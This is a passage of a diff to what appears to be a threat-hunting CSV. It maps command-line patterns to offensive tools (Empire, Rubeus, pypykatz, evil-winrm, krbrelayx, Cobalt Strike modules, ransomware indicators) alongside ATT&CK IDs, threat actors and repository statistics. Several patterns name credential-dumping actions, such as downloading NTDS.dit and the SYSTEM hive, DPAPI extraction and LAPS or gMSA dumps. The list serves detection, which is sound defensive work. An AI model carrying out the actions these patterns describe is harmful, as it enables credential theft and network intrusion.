- TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --dont-enumerate-acls *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* --dont-enumerate-acls * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* donut.c *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"* donut.exe *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"* donut.o *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.c *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.exe *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* donut.o *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* --dotnetassembly * --amsi*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --appdomain *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --assemblyargs *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --mailslot*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --pipe *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* -Downgrade False -Restore False -Impersonate True * -challange *","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" -"* download *\NTDS\NTDS.dit*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"* download *\Windows\System32\config\SYSTEM*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* download *\NTDS\NTDS.dit*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"* download *\Windows\System32\config\SYSTEM*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "* dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dpapi blob *.json *.dat*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* dpapi credential *.json cred*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" @@ -531,24 +531,24 @@ "* drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DriverName *Xeroxxx*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --drop-drag-and-drop-target*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* dump * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* dump --bucket *--dump-dir*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"* dump * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* dump --bucket *--dump-dir*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "* dump_memory64*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" -"* --dump-adcs*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"* -DumpCerts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -DumpCreds *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"* --dump-gmsa*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"* --dump-laps*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --dump-adcs*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -DumpCerts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -DumpCreds *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation 